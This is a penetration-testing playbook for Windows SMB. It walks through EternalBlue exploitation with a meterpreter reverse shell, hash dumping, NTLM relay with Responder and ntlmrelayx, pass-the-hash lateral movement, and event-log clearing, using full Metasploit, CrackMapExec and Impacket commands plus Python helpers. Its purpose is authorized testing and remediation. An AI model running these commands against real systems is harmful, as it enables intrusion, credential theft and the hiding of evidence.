
Exploiting SMB Vulnerabilities with Metasploit


When to Use


  • Testing Windows systems during authorized penetration tests for critical vulnerabilities reachable over SMB: EternalBlue and EternalRomance (MS17-010, SMBv1) and PrintNightmare (CVE-2021-34527, a Print Spooler bug triggered over the spoolss named pipe on TCP 445)
  • Demonstrating lateral-movement risk via NTLM relay to hosts that do not require SMB signing, pass-the-hash with dumped NT hashes, and password spraying
  • Validating that patch management has actually closed known SMB vulnerabilities, rather than trusting the patch inventory
  • Assessing SMB signing enforcement and share permission configurations across the domain
  • Testing network segmentation by attempting SMB exploitation across VLAN boundaries
Do not use against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment.

Prerequisites


  • Metasploit Framework 6.x installed (confirm with `msfconsole --version`)
  • Authorized penetration test scope document listing target IP ranges and approved attack types
  • Network access to target SMB services (TCP 445; TCP 139 only matters for NetBIOS-session SMB on legacy hosts)
  • CrackMapExec (or its maintained successor NetExec, whose `nxc` CLI takes the same arguments) and Impacket installed for complementary SMB testing
  • Valid test credentials or credential wordlists approved for the engagement
  • Kali Linux or equivalent testing platform

Workflow


Step 1: Enumerate SMB Services and Versions


```bash
# Discover hosts with SMB open using Nmap (-sS needs root; -oA writes smb_hosts.nmap/.gnmap/.xml)
nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24

# Enumerate SMB versions and OS information; smb-protocols lists every dialect the host accepts,
# including SMBv1, which a scanner that only negotiates the highest dialect would never show
nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24

# Use CrackMapExec for rapid SMB enumeration and write the hosts that do not require signing
# to a relay target list for Step 4
crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt

# Check SMB signing status: there is no dedicated flag, the per-host banner line already shows
# (signing:False) and (SMBv1:True); signing False means the host accepts relayed, unsigned sessions
crackmapexec smb 10.10.0.0/24

# Enumerate shares with a null session
crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares
```
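The signing and SMBv1 checks above are a dialect negotiation under the hood, and it is worth seeing the wire format rather than trusting a tool's banner line. The following Python is an added example, not CrackMapExec or Nmap code: it builds the SMB2 and SMB1 NEGOTIATE requests a scanner sends, parses the SecurityMode flags of the NEGOTIATE response, converts the grepable Nmap output from the first command into the one-host-per-line list later steps expect, and derives the same no-signing list that `--gen-relay-list` writes. The Nmap output and the server reply used for testing are constructed; the live `probe()` function assumes direct TCP reachability to port 445, and the addresses are the page's own.

```python
"""SMB negotiate helpers: what --gen-relay-list and smb-protocols check on the wire.
Added example; uses only the Python standard library."""
import socket
import struct
import uuid

SMB2_NEGOTIATE_SIGNING_ENABLED = 0x01   # SecurityMode bit: server supports signing
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x02  # SecurityMode bit: server rejects unsigned sessions
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}

# Constructed nmap grepable output (not a real scan), in the shape -oA smb_hosts writes to smb_hosts.gnmap.
SAMPLE_GNMAP = """# Nmap 7.94 scan initiated (constructed sample)
Host: 10.10.5.23 ()\tStatus: Up
Host: 10.10.5.23 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
Host: 10.10.5.30 ()\tPorts: 445/open/tcp//microsoft-ds///
Host: 10.10.5.40 ()\tPorts: 445/filtered/tcp//microsoft-ds///
"""


def parse_gnmap(text):
    """IPs whose grepable line shows 445/open: the one-host-per-line list RHOSTS file: expects."""
    hosts = {line.split()[1] for line in text.splitlines()
             if line.startswith("Host:") and "445/open" in line}
    return sorted(hosts)


def smb2_negotiate_request(dialects=(0x0202, 0x0210, 0x0300, 0x0302)):
    """64-byte SMB2 header (Command 0 = NEGOTIATE) plus the 36-byte NEGOTIATE body offering SMB 2.x/3.0.x."""
    header = struct.pack("<4sHHIHHIIQIIQ16s", b"\xfeSMB", 64, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), SMB2_NEGOTIATE_SIGNING_ENABLED, 0, 0,
                       uuid.uuid4().bytes, 0)
    return header + body + b"".join(struct.pack("<H", d) for d in dialects)


def smb1_negotiate_request():
    """SMB1 NEGOTIATE (command 0x72) offering only 'NT LM 0.12'; a host with SMBv1 disabled does not answer with an SMB1 header."""
    header = struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", 0x72, 0, 0x18, 0xC801, 0, b"\x00" * 8, 0, 0, 0, 0, 0)
    dialects = b"\x02NT LM 0.12\x00"
    return header + struct.pack("<BH", 0, len(dialects)) + dialects


def parse_smb2_negotiate_response(msg):
    """Return (dialect, signing_enabled, signing_required) from an SMB2 NEGOTIATE response (MS-SMB2 2.2.4)."""
    if msg[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    status, command = struct.unpack_from("<IH", msg, 8)
    if command != 0 or status != 0:
        raise ValueError(f"unexpected command {command} / NT status {status:#010x}")
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", msg, 64)
    if structure_size != 65:
        raise ValueError("malformed NEGOTIATE response")
    return (DIALECTS.get(dialect, f"{dialect:#06x}"),
            bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
            bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED))


def constructed_negotiate_response(security_mode, dialect=0x0302):
    """A server reply built locally for offline testing; not captured from any real host."""
    header = struct.pack("<4sHHIHHIIQIIQ16s", b"\xfeSMB", 64, 1, 0, 0, 1, 0x1, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body + b"\x00"


def _exchange(host, message, port=445, timeout=3.0):
    """Send one NetBIOS-session-framed SMB message and return the reply (live network; not used offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(struct.pack(">I", len(message)) + message)  # 0x00 type byte + 24-bit length
        head = sock.recv(4)
        if len(head) < 4:
            return b""  # connection closed: what an SMB1 probe gets from a host with SMBv1 disabled
        length = struct.unpack(">I", head)[0] & 0xFFFFFF
        data = b""
        while len(data) < length:
            chunk = sock.recv(length - len(data))
            if not chunk:
                break
            data += chunk
        return data


def probe(host):
    """Live check of one host: negotiated dialect, signing flags, and whether SMBv1 still answers."""
    dialect, enabled, required = parse_smb2_negotiate_response(_exchange(host, smb2_negotiate_request()))
    smbv1 = _exchange(host, smb1_negotiate_request())[:4] == b"\xffSMB"
    return {"host": host, "dialect": dialect, "signing_enabled": enabled,
            "signing_required": required, "smbv1": smbv1}


def relay_targets(results):
    """Hosts that accept unsigned sessions: the same set --gen-relay-list writes out."""
    return [r["host"] for r in results if not r["signing_required"]]
```

`signing_enabled` alone is not a finding: Windows servers always advertise SIGNING_ENABLED, and only SIGNING_REQUIRED blocks relay. Feed `parse_gnmap(open("smb_hosts.gnmap").read())` into `probe()` per host and pass the results to `relay_targets()` to reproduce `smb_nosigning.txt` without CrackMapExec.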

Step 2: Scan for Known SMB Vulnerabilities


```bash
# Start Metasploit and scan for MS17-010 (EternalBlue). RHOSTS file: reads one host or CIDR per line;
# Step 1's -oA smb_hosts writes .nmap/.gnmap/.xml rather than .txt, so build smb_hosts.txt from the
# Host: lines of smb_hosts.gnmap that show 445/open before running this.
msfconsole -q
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS file:smb_hosts.txt
msf6 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 10
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

# Check for MS08-067 (the Conficker-era Server service bug; only XP/2003-era hosts are affected).
# Metasploit ships no separate scanner for it: use the exploit module's non-destructive check command.
msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS file:smb_hosts.txt
msf6 exploit(windows/smb/ms08_067_netapi) > check

# Check for SMBGhost (CVE-2020-0796): only SMB 3.1.1 with compression on Windows 10 / Server 1903 and 1909.
# smb-vuln-cve-2020-0796 is a community NSE script, not part of the default Nmap install; drop it into the
# scripts directory and run nmap --script-updatedb first.
nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24

# Check for PrintNightmare (CVE-2021-34527); needs a valid domain account. Module names differ between
# CrackMapExec and NetExec releases, so list them with -L if this one is not found.
crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare
```

Step 3: Exploit EternalBlue (MS17-010)


```bash
# The module supports x64 targets only and can blue-screen an unstable host; run the module's check
# command against the target before exploit, and stay off production servers outside a maintenance window.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.5.23
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.1.99
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set MaxExploitAttempts 3
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# Post-exploitation: verify access level. The exploit runs in the kernel, so the session is SYSTEM without
# any privilege escalation.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > hashdump
```

Step 4: Perform SMB Relay Attack


```bash
# Identify hosts that do not require SMB signing (smb_nosigning.txt from Step 1)

# Set up NTLM relay with Impacket. If Responder runs alongside it, set SMB = Off and HTTP = Off in
# Responder.conf first so Responder poisons names but does not answer the SMB/HTTP connections itself;
# otherwise Responder captures the hash and ntlmrelayx never sees the authentication.
sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i

# Trigger authentication from a compromised host or via phishing.
# From a Meterpreter session on a compromised host (UNC paths need double backslashes in cmd.exe).
# With no credentials given, net use authenticates with the calling token; the explicit account below
# only makes sense when the engagement already holds that password.
meterpreter > shell
C:\> net use \\10.10.1.99\share /user:DOMAIN\admin password

# Or use Metasploit's SMB relay module. Newer Metasploit releases rewrote this module with SMB2 support
# and name the target option RELAY_TARGETS instead of SMBHOST; run show options to confirm.
msf6 > use exploit/windows/smb/smb_relay
msf6 exploit(windows/smb/smb_relay) > set SMBHOST 10.10.5.30
msf6 exploit(windows/smb/smb_relay) > set LHOST 10.10.1.99
msf6 exploit(windows/smb/smb_relay) > exploit

# Use Responder to capture NetNTLMv2 responses for offline cracking (hashcat -m 5600) when no relay
# target is available. A captured NetNTLMv2 response is bound to the server challenge and cannot be
# passed like an NT hash; it is only useful cracked or relayed live.
sudo responder -I eth0 -wrfv
```
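Why relay must happen live, why signing stops it, and what Responder's capture line contains all follow from the NTLMv2 arithmetic in MS-NLMP. The block below is an added example using only the Python standard library, not Responder or ntlmrelayx code: the NT hash is the value shown in Step 5, and the challenges, timestamp and AV pairs are constructed. It assumes SMB 2.0.2/2.1 signing (HMAC-SHA256) with no NTLMSSP key exchange, so the signing key is the NTLMv2 SessionBaseKey.

```python
"""NetNTLMv2 on the wire: what Responder captures, what ntlmrelayx forwards, and why a
signing-required target rejects the relayed session. Added example; stdlib only."""
import hashlib
import hmac
import struct

# Constructed inputs for the demonstration (no real credentials or captures).
NT_HASH = bytes.fromhex("e19ccf75ee54e06b06a5907af13cef42")  # the NT hash shown in Step 5
USER, DOMAIN = "admin", "CORP"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")          # 8 bytes chosen by the server
CLIENT_CHALLENGE = bytes.fromhex("aabbccddeeff0011")          # 8 bytes chosen by the client
TIMESTAMP = 0x01D9A4C3B2E1F000                                 # FILETIME (100 ns units since 1601)
AV_PAIRS = struct.pack("<HH", 2, 8) + "CORP".encode("utf-16le") + struct.pack("<HH", 0, 0)  # NbDomainName, EOL


def ntowf_v2(nt_hash, user, domain):
    """NTLMv2 key: HMAC-MD5 keyed with the NT hash over UTF-16LE(UPPER(user) + domain). MS-NLMP 3.3.2."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def ntlmv2_response(nt_hash, user, domain, server_challenge, client_challenge, timestamp, av_pairs):
    """Return (NTProofStr, temp blob, SessionBaseKey) exactly as the client computes them."""
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    key = ntowf_v2(nt_hash, user, domain)
    nt_proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    session_base_key = hmac.new(key, nt_proof, hashlib.md5).digest()
    return nt_proof, blob, session_base_key


def responder_line(user, domain, server_challenge, nt_proof, blob):
    """The hashcat -m 5600 / john netntlmv2 line Responder logs for a captured authentication."""
    return f"{user}::{domain}:{server_challenge.hex()}:{nt_proof.hex()}:{blob.hex()}"


def verify_capture(line, candidate_nt_hash):
    """What an offline cracker does per guess: recompute NTProofStr from a candidate NT hash and compare."""
    user, _, domain, chal, proof, blob = line.split(":")
    key = ntowf_v2(candidate_nt_hash, user, domain)
    expected = hmac.new(key, bytes.fromhex(chal) + bytes.fromhex(blob), hashlib.md5).digest()
    return hmac.compare_digest(expected, bytes.fromhex(proof))


def smb2_sign(session_key, message):
    """SMB 2.0.2/2.1 signing: HMAC-SHA256 over the message with the Signature field (bytes 48..63) zeroed, truncated to 16 bytes."""
    zeroed = message[:48] + b"\x00" * 16 + message[64:]
    return hmac.new(session_key, zeroed, hashlib.sha256).digest()[:16]


def relay_succeeds(target_requires_signing):
    """Simulate ntlmrelayx: the target accepts the forwarded response, but only the victim (and the DC)
    can derive SessionBaseKey, so a signing-required target rejects everything the relay sends afterwards."""
    nt_proof, blob, victim_key = ntlmv2_response(NT_HASH, USER, DOMAIN, SERVER_CHALLENGE,
                                                 CLIENT_CHALLENGE, TIMESTAMP, AV_PAIRS)
    # The target validates NTProofStr via the DC (which knows the NT hash) and accepts the session.
    accepted = verify_capture(responder_line(USER, DOMAIN, SERVER_CHALLENGE, nt_proof, blob), NT_HASH)
    if not accepted:
        return False
    if not target_requires_signing:
        return True  # unsigned TREE_CONNECT and IPC$ traffic is accepted as the victim
    request = b"\xfeSMB" + b"\x00" * 60 + b"TREE_CONNECT"
    forged = smb2_sign(b"\x00" * 16, request)  # the relay holds no key derived from the NT hash; any key is a guess
    return hmac.compare_digest(forged, smb2_sign(victim_key, request))
```

Two consequences are visible in the code: the same response verifies only against the server challenge it was computed for, which is why relaying is a live man-in-the-middle and not a replay, and the session key is a function of NTOWFv2, which is why requiring signing turns a successful relay into a session the attacker cannot use.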

Step 5: Pass-the-Hash and Lateral Movement via SMB


```bash
# Extract hashes from the compromised system (the local SAM; on a non-DC these are local accounts)
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::

# Pass the hash with CrackMapExec. Administrator here is RID 500 from the local SAM, so add --local-auth;
# without it CME tries a domain logon with that hash, which fails even where the local password is reused.
# "Pwn3d!" in the output marks hosts where the hash gives local admin.
crackmapexec smb 10.10.0.0/24 -u Administrator -H e19ccf75ee54e06b06a5907af13cef42 --local-auth --shares

# Execute commands via pass-the-hash
crackmapexec smb 10.10.5.30 -u Administrator -H e19ccf75ee54e06b06a5907af13cef42 --local-auth -x "whoami && hostname"

# Use Impacket psexec for an interactive SYSTEM shell (-hashes takes LM:NT; the LM half is the empty-LM marker)
impacket-psexec Administrator@10.10.5.30 -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

# Use the Metasploit psexec module (SMBPass accepts LM:NT; SMBDomain defaults to the local machine)
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.5.30
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set LHOST 10.10.1.99
msf6 exploit(windows/smb/psexec) > exploit
```
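Pass-the-hash works because the NT hash is the only secret NTLM ever uses, and hashdump output is where most engagements find the local-administrator password reuse described in the scenario later on this page. The following Python is an added example, not Metasploit or CrackMapExec code: it computes NT hashes with a pure-Python MD4 (hashlib's md4 is missing on OpenSSL 3 builds without the legacy provider), parses pwdump-format hashdump lines, flags the empty-LM and empty-password markers, and reports which hosts share a local Administrator (RID 500) NT hash. The dumps are constructed for the example; the hash values match those shown on this page.

```python
"""NT hash computation and hashdump analysis for pass-the-hash. Added example; stdlib only."""
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password: "no LM hash stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password (MD4 of nothing)
_MASK = 0xFFFFFFFF


def md4(data):
    """RFC 1320 MD4 in pure Python. Not for new designs; here only because NT hashes are MD4."""
    def rotl(x, s):
        x &= _MASK
        return ((x << s) | (x >> (32 - s))) & _MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a, b, c, d = ((j - i) % 4 for j in range(4))  # (a,b,c,d) -> (d,a,b,c) -> (c,d,a,b) -> (b,c,d,a)
                v[a] = rotl(v[a] + fn(v[b], v[c], v[d]) + x[k] + const, shifts[i % 4])
        state = [(s + w) & _MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)): the value -H, SMBPass and -hashes take in Step 5."""
    return md4(password.encode("utf-16le")).hex()


def parse_hashdump(text):
    """Parse pwdump-format lines 'user:rid:lm:nt:::' into dicts; blank and malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        entries.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt,
                        "lm_stored": lm != EMPTY_LM, "empty_password": nt == EMPTY_NT,
                        "impacket_hashes": f"{lm}:{nt}"})  # the LM:NT form -hashes wants
    return entries


def admin_hash_reuse(dumps):
    """Map each RID-500 NT hash to the hosts it appears on; any hash seen on 2+ hosts is lateral movement."""
    seen = {}
    for host, text in dumps.items():
        for entry in parse_hashdump(text):
            if entry["rid"] == 500 and not entry["empty_password"]:
                seen.setdefault(entry["nt"], []).append(host)
    return {nt: sorted(hosts) for nt, hosts in seen.items() if len(hosts) > 1}


# Constructed hashdump output for three hosts (fabricated for this example, not from any engagement).
SAMPLE_DUMPS = {
    "10.10.5.23": "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::\n"
                  "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n",
    "10.10.5.30": "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::\n",
    "10.10.8.10": "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::\n",
}
```

Running `admin_hash_reuse` over one dump per host gives the Finding 3 evidence directly, and `nt_hash()` lets you confirm a cracked or guessed password against a dumped hash without touching the target again.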

Step 6: Document Findings and Clean Up


```bash
# Document all compromised systems and access levels

# In Meterpreter, screenshot desktops for evidence (only where the rules of engagement allow capturing screen content)
meterpreter > screenshot

# List accessible shares and sensitive data
meterpreter > shell
C:\> net share
C:\> dir \\10.10.5.30\C$\Users\ /s /b

# Clean up: remove the artifacts you created. Only clear event logs when the rules of engagement
# explicitly permit it; wiping logs destroys the client's record of the test and the detection evidence
# their SOC should be reviewing. Record every artifact (dropped binaries, services, accounts) in the report.
meterpreter > clearev
# payload.exe stands for whatever you dropped; the Metasploit psexec module removes its own service binary
# from ADMIN$ on session close, and the EternalBlue stager lives in memory only.
meterpreter > shell
C:\> del /f C:\Windows\Temp\payload.exe

# Close all sessions
msf6 > sessions -K

# Verify cleanup
crackmapexec smb 10.10.5.23 -u Administrator -H <hash> --local-auth -x "dir C:\Windows\Temp\payload*"
```

Key Concepts


  • EternalBlue (MS17-010): Critical remote code execution in SMBv1 (CVE-2017-0144) giving SYSTEM without authentication; the exploit came from the Equation Group tooling the Shadow Brokers published in April 2017, one month after Microsoft had shipped the MS17-010 patch
  • SMB Signing: A MAC over every SMB message (HMAC-SHA256 for SMB 2.x, AES-CMAC or AES-GMAC for SMB 3.x) keyed from the session key. A relayed NTLM authentication yields a session whose key the attacker cannot derive, so a host that requires signing rejects the relayed session; a host that merely enables signing accepts unsigned traffic and can be relayed to
  • Pass-the-Hash: Authenticating with the NT hash directly instead of the password; NTLM only ever proves possession of the hash, so nothing needs to be cracked
  • NTLM Relay: Forwarding a victim's NTLM challenge/response exchange to a different server in real time, so the attacker is authenticated there as the victim; the response is bound to that server's challenge, which is why it must be relayed live and cannot be replayed later
  • PsExec: Remote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service through the Service Control Manager to run it as SYSTEM
  • Null Session: Anonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured or legacy systems

Tools & Systems


  • Metasploit Framework: Exploitation framework with dedicated SMB scanner, exploit, and post-exploitation modules for comprehensive SMB testing
  • CrackMapExec: Swiss-army knife for SMB enumeration, credential testing, share enumeration, and command execution across Windows networks; the project is archived and continues as NetExec (nxc) with the same command syntax
  • Impacket: Python library and example scripts (psexec, smbclient, ntlmrelayx and others) for low-level SMB and MSRPC interaction
  • Responder: LLMNR/NBT-NS/mDNS poisoner that captures NetNTLMv1/v2 responses from Windows name-resolution fallback behaviour
  • enum4linux-ng: Updated SMB enumeration tool for extracting users, groups, shares, and policies from Windows/Samba hosts

Common Scenarios


Scenario: Internal Penetration Test Targeting Windows Domain via SMB


Context: During an internal penetration test for a financial services firm, the tester has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. The Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts.
Approach:
  1. Scan the entire /16 for open SMB ports and enumerate OS versions and signing status with CrackMapExec
  2. Identify 12 hosts running Windows Server 2012 R2 without the MS17-010 patch applied
  3. Exploit EternalBlue on a non-critical file server (10.10.5.23) to gain SYSTEM access
  4. Extract the local Administrator password hash with hashdump and, by passing it across the range, discover that the same password is reused on 47 hosts
  5. Use pass-the-hash to access a domain controller and extract the NTDS.dit database
  6. Demonstrate that SMB signing is not required on 83% of hosts, enabling relay attacks
  7. Document the complete attack chain showing how one unpatched system led to full domain compromise
Pitfalls:
  • The EternalBlue exploit can blue-screen the target, especially older or already unstable systems; run the module's check first and keep production servers out of scope unless a maintenance window is agreed
  • Running psexec on heavily monitored endpoints may trigger EDR alerts (service creation plus a new binary in ADMIN$) and burn the engagement
  • Running hashdump on a domain controller with a large NTDS database can degrade performance; schedule it inside the maintenance window
  • Check for SMBv1 explicitly: a scanner that negotiates the highest dialect reports SMB2/3 and never shows that SMBv1 still answers (smb-protocols from Step 1 lists every dialect the host accepts)

Output Format


SMB Vulnerability Assessment Report


Engagement: Internal Penetration Test
Target Range: 10.10.0.0/16 (CORP.EXAMPLE.COM)
SMB Hosts Discovered: 187

Critical Findings


Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts
  • Severity: Critical (CVSS 9.8)
  • Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others)
  • Impact: Remote code execution as SYSTEM without authentication
  • Exploited: Yes - gained SYSTEM on 10.10.5.23
  • Remediation: Apply the MS17-010 update and disable SMBv1 on every host
Finding 2: SMB Signing Not Required - 155/187 Hosts
  • Severity: High (CVSS 7.5)
  • Impact: NTLM relay attacks allow credential forwarding to any of these hosts
  • Exploited: Yes - relayed domain admin credentials
  • Remediation: Require SMB signing via Group Policy ("Microsoft network server: Digitally sign communications (always)"); merely enabling it does not stop relay
Finding 3: Local Admin Password Reuse - 47 Hosts
  • Severity: High (CVSS 7.2)
  • Impact: Compromise of one host enables lateral movement to 47 systems with the same local Administrator hash
  • Remediation: Deploy LAPS (Local Administrator Password Solution) so every host has a unique, rotated local admin password